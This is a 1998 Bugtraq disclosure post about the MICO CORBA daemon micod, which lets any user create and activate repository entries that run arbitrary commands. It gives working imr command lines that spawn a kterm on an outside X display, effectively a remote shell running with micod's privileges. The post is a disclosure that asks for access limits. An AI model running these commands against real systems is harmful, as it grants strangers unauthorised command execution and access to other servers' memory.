[6723] in bugtraq
MICO: security problem: Privileges of micod for everybody!
daemon@ATHENA.MIT.EDU (Dominique Unruh)
Sun May 10 15:28:03 1998
Date: Sun, 10 May 1998 12:30:01 +0200
Reply-To: Dominique Unruh <dominique@UNRUH.DE>
From: Dominique Unruh <dominique@UNRUH.DE>
X-To: roemer@vsb.cs.uni-frankfurt.de
To: BUGTRAQ@NETSPACE.ORG
After having installed MICO (a free CORBA-ORB for C++) I installed the
'micod' (a daemon which is e.g. able to create objects on request).
I put it in my boot-up scripts, so it ran as root, but this exploit will
work too, if it is started as another user.
After thinking for a moment I tried this (as guest, but could be a user
on another system too):
(micod ist started on inet:winkelklinke.local:8888)
(hacking from enfin.local, which has X on display :0)
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
"kterm -display enfin.local:0 & echo" IDL:Anything:1.0
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play
kterm will start as child of micod and connect to enfin.local:0.
(any other program should work too, but xterm didn't start correctly, I
don't know why)
The 'echo' after the '&' is needed to absorb the arguments micod add to
the command-line.
Now you can do everything.
Don't underestimate the problem if micod is not installed root:
1. You can login, it's as good as a pwd-free guest account.
2. You may control other servers started by micod or see their
process-memory (e.g. under Linux with /proc, but their may be other ways
on other systems), which may contain sensitive data as access password,
credit card information or whatever, depending of your application.
I think, there should be some kind of access limitation when writing
into the Implemetation Repository (the information managed by micod).
And there should be a visible warning in the documentation.
DniQ.
PS: Hallo Nahne!
